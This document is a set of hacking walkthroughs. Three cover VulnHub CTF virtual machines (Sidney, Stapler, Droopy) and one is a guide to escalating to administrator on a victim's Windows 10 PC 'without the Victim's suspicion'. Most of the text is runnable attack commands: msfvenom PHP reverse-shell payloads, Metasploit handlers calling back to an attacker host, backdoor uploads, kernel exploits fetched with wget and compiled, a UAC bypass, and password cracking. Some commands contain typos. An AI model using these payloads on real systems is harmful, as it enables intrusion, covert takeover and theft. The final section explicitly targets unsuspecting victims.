Hack the Sydney VM (CTF Challenge)

Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares.This is the third challenge he genially came up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/

Breaching Methodolgies:

1.       Network Scanning (Nmap, netdiscover)

2.       Information gathering:

·         web server enumeration (view source)

·         Directory brute-force (dirb)

·         Wikipedia

3.       Generate own Dictionary (crunch)

4.       Login into admin console

5.       Generate PHP Backdoor (Msfvenom)

6.       Upload and execute a backdoor

7.       Reverse connection (Metasploit)

8.       Kernel privilege escalation (Metasploit)

9.       Gain root access

10.    Penetrate for flag.zip

11.    Access Ram and finished the task

First things we need to know what IP did the VM got. So naturally scan the network using:

netdiscover

Now that we have located our target IP i.e. 192.168.1.103, our next step is to scan it.

nmap -A -p- 192.168.1.103

Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.

Then we decided to look into its page source.

So we opened it in the browser (192.168.1.103/commorode64) and to our luck we found another page.

As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :

• the password is in lowercase
• password has 3 letters and four digits
• and it is related to c=64 sound chip

Then we run dirb for web directory brute-force attack and here it has shown so many directories. But I was interested in index.php and decide to explore it.

So we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.

Getting the above hints about password, we firstly decided to look up c=64 sound chip on wikipedia. And we found:

We knew that password’s first three digits are alphabetic letters and so our best guess is MOS are the first three digits of the password.

Now everything falls on the last four digits of the password and finds that we used crunch command.

crunch 7 7 -t mos%%%% -o /root/Desktop/dict. txt

Crunch will generate your dictionary file.

And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:

Now on the index.php page enter the username and password. Following page will open and on this page you have to upload a malicious php file

Entering the password you will logon to the following page:

Now to generate the said php open the terminal in your Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

Simultaneously start multi handler inside metasploit framework.

Copy the code from to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation.

By executing sysinfo we came to know about the target’s architecture i.e. kernel 4.4; and with help of this we found metasploit exploit for kernel privilege escalation. Further type following command:   

use exploit/linux/local/bpf_priv_esc

msf exploit(linux/local/bpf_priv_esc) > set session 1

msf exploit(linux/local/bpf_priv_esc) > set lhost192.168.1.108

msf exploit(linux/local/bpf_priv_esc) > set lport 8888

msf exploit(linux/local/bpf_priv_esc) > exploit

And it will give 2^nd meterpreter session with root privilege, now let’s get into root directory and capture the flag.

cd /root

ls

It gave us hint.gif file, let’s download it.

download hint.gif /root/Desktop/

So when we opened hint.gif it has shown below image and I was unable to take-out hint from their conversation.

Further I execute following command:

cd .commodor64

ls

cd .miami

ls

cd vice

ls

Here is flag.zip file let’s download it on our desktop with help of following command:

download flag.zip /root/Desktop/

We will apply dictionary attack using rockyou.txt so for this the command is:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip

And yes, at last you have the password. So now unzip the flag.zip by typing:

unzip flag.zip

Then it will ask you the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Hack the Stapler VM (CTF Challenge)

In this article we will try to attack and gain root access to the Stapler: 1 challenge from VulnHub. The goal is to reconnaissance, enumeration, and exploits this vulnerable machine to get root access and to read the contents of flag.txt. We have been told that are various methods to do so but we have tried and found the simplest way.

Download the stapler vm from here

Penetrating Methodology:

·         Network Scanning (Nmap, netdiscover)

·         Enumeration (robot.txt)

·         Wordpress scanning & password cracking (wpscan)

·         Login into Wordpress

·         Generate PHP Backdoor (Msfvenom)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Import python one-liner for proper TTY shell

·         Kernel privilege escalation

·         Get Root access and capture the flag.

Start off with scanning the network to find our target. And we all the command for it is:

netdiscover

We found our target –> 192.168.1.126

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.126

Result will shows us that port number 21, 22, 53, 80, 137, 139, and so many other ports are open.

Also tell us about robot.txt 2 disallowed entries i.e. /admin112233 and /blogblog. Then we explored target IP over port 80 but didn’t found anything here.

So we tried opening it in browser with port 12380

We open /blogblog/ but here also didn’t find any clue for next step.

Then we thought to explore https://192.168.1.126:12380/blogblog/ which put up a new web page as shown below. Studying this blog we have established that the blog is made of Word Press. Now obviously use WPScan to know all about the blog. 

To apply wpscan we have come up with a 3-in-1 command as it will tell us all about the theme and plug-ins as well as usernames and the command is:

wpscan –url https://192.168.1.126/blogblog/ --enumerate at--enumerate ap --enumerate u --disable-tls-checks

It has dumped all username for login, now we only need password for login into wordpress.

By executing below command you will get password for John.

wpscan -u https://192.168.1.126/blogblog/ --username John --wordlist /usr/share/wordlists/rockyou.txt

As you can see the password is “incorrect” for user “john”; now use these credential for login into wordpress.

As we logged in, all now we have to do is to create our PHP code to upload so that once the code will execute we will have its session. To generate the code type:

msfvenom -p php/meterpreter/reverse_tecp lhost-192.168.1.132 lport=4444 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from  to die() and save it in a file with .php extension.

Now, as we already logged on, go to plugins option then select add plugin option. Click on browse option and select the PHP in which you have just saved the code and click on OK.

Now go to the upload directory and double click on the shell.php which you just uploaded.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.132

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation. Further type:

sysinfo

Then to access proper TTY shell we had import python one line script by typing following:

Shell

python -c 'import pty;pty.spawn("/bin/bash")'

lsb_rlease -a

We now know that our target is using Ubuntu 16.04 so we will try and search its exploit on exploit-db.com. Our search is successful and we have found our appropriate exploit as shown below:

Now, we need to go into the desired writable file and for that type:

cd /tmp

And then to download the exploit type:

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

When we download the exploit, zip files are downloaded and now unzip it and for that type:

unzip 39772.zip

Open the unzipped file by typing:

ls

cd 39772

Now we have a tar file named exploit.tar. Open it with the following command:

tar -xvf exploit.tar

Now use the ls command to view the directories. Now we will go into the double put-exploit folder and for that type:

cd ebpf_mapfd_doubleput_exploit

ls 

./compile.sh (will run the compile.sh)

./doubleput (will run the double.sh)

cd /root (will take you into /root)

ls (shows you the directories of /root)

cat flag.txt

Note: This lab can be solved in multiple ways because there are more than one method to hack this lab.

Hack the Droopy VM (CTF Challenge)

Droopy Walkthrough

In this article we will complete a challenge of Capture the Flag series. This is Walkthrough of Droopy VM which is a vulnerable framework but it is little bit complex too. Download it from –> Here

Walkthrough

Let us start by scanning the network so that we can know the IP of our target. And to scan the network types the following:

netdiscover

So by using the above command we know our target IP is 192.168.1.102. Now that we know our target IP, lets study it more by using nmap :

nmap -p- -A 192.168.1.102

Here,

-p-  à is for port by port search

-A à is for an thorough search

By using nmap we fing that port no. 80 isi the only one that is opened. So therefore, lets fire up the IP in the browser.

By studying the webpage we get to know that the website has been made in drupal CMS. And we all know that there is an very effective exploit for it in Metasploit and to use that type :

use exploit/multi/http/drupal_drupageddon

 once the exploit starts working, it will ask you for rhost which you set by following command and then runt he exploit.

set rhost 192.168.1.102

exploit

As the exploits runs, you will have your meterpreter session. Type sysinfo as the first command to gather information about the target. This way we come to know that the OS used by target is linux with the version of 3.13.0, this version of linux has its own exploit which you can find on www.exploit-db.com. Once you find the exploit there, download it and then type the following command in the terminal of kali :

searchsploit 3.13.0

Go to the /tmp folder by typing cd /tmp and upload the exploit there by typing :

upload /root/Desktop/37292.c

Oncethe exploit is uploaded, got o shell by simply giving shell command. And then type :

python -c ‘import pty;pty.spawn(“/bin/bash”)’

And then type the following command to compile the exploit :

gcc 37292.c -o shell

once the exploit is compiled give the permissions to shell :

chmod 777 shell

and then run the ./shell command for your exploit to work. This is the exploit for privilege escalation so when this exploit runs, you will have your privilege to the VM.

After this check you id by simply typing id.  It shows that you are the root. So lets jump to the folder root by typing cd /root and then type ls to check the file inside the root folder. And here we have one file in the root. Lets copy it to var/www/html so we can open the file in the browser :

cp dave.tc /var/www/html

Now lets open the file in the browser by typing :

192.168.1.102/dave.tc

And then we will go into the /var by typing cd /var and then type ls to view its content. Now lets go into mail by typing cd mail and then ls to view its content. And the type  cat www-data to read whatever’s inside it.

In www-data we find a mail. This mail gives us two hints about the password that we need i.e. we will find our password in the rockyou wordlist and password contain prefix or suffix “academy”. So we will take all the words from rockyou wordlist that has acadaemy in it and make a different wordlist with all the possible passwords. And for this type :

Cat rockyou.txt | grep academy > /root/Desktop/dict.txt

Now from the wordlist, that we just created, we will apply dictionary attack to have our password. And so for this type :

truecrack –truecrypt /root/Downloads/dave.tc -k SHA512 -w /root/Desktop/dict.txt

Now using veracrypt we can decrypt the file.

To decrypt the file enter the password that we just found.

Once it opens you can see all of its content.

Following are the folders you will find in it.

Open its path in the terminal of kali and type ls -la to view the files. Open secret by typing cd .secret and the type ls -la to see its content. And then open .top by typing cd .top and then type ls -la to see all the files in it. There you will find flag.txt, type cat flag.txt to view the flag.

And yippiiee!!! We found our flag. 😊

Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Microsoft is increasing its security with the evolution of their windows. And with that it is getting more and more difficult to hack them. It is often said "where there is will; there is a way", threfore thankfully it is not impossible to do so. Once you have hacked into WIndows 10 PC then it is difficult to gain it administrator access without getting your victim suspicious. Therefore, we present you a new way to do so.

Move along with following steps and you will learn how to gain administrator access of windows 10 PC without the Victim's suspicion.

First of all, to learn to how to hack victim's PC click here.

After hacking when you have gained a meterpreter session then type :

getsystem

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry. Just download this Tpinit file from --> here

And now upload the said file into victim's PC by typing :

upload /root/Desktop/TpmIniyUACBypass.exe d:\\

Here,

upload --> is use to upload a file

/root/Desktop/TpmIniyUACBypass.exe --> is the path of the file that is to be uploaded

d:\\ --> is location of where the file will be uploaded in victim's PC

As the file is uploaded, open metasploit simultaneously and type :

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 102.168.0.106

set lport 443

exploit

Once this exploit is executed. go to the meterpreter session that you previously had and type :

shell

Typing shell will take you to the shell of the PC. Now further type :

d: (This command will take into the D Drive of victim's PC i.e where you upload your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command will execute your uploaded file)

As the command will make our file execute we will have a session with administrator privileges as shown